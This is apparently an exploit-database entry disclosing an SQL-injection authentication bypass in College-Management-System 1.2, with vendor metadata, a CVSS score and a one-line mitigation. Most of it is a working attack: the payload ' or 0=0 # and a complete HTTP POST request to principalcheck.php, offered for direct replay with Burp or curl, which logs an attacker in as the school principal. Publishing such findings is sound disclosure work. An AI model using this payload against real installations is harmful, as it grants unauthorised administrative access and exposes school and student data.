College-Management-System 1.2 - Authentication Bypass

vendor:

College-Management-System

by:

Cakes

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: College-Management-System

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:ajinkyabodade:college-management-system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: CentOS 7

2019

College-Management-System 1.2 – Authentication Bypass

Easy authentication bypass vulnerability on the application allowing the attacker to log in as the school principal. Simply replay the below Burp request or use Curl. Payload: ' or 0=0 #

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.

Source

Exploit-DB raw data:

# Exploit Title: College-Management-System 1.2 - Authentication Bypass
# Author: Cakes
# Discovery Date: 2019-09-14
# Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System
# Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip
# Tested Version: 1.2
# Tested on OS: CentOS 7
# CVE: N/A

# Discription:
# Easy authentication bypass vulnerability on the application 
# allowing the attacker to log in as the school principal.

# Simply replay the below Burp request or use Curl.
# Payload: ' or 0=0 #

POST /college/principalcheck.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/college/principalcheck.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

emailid='%20or%200%3d0%20#&pass=asdf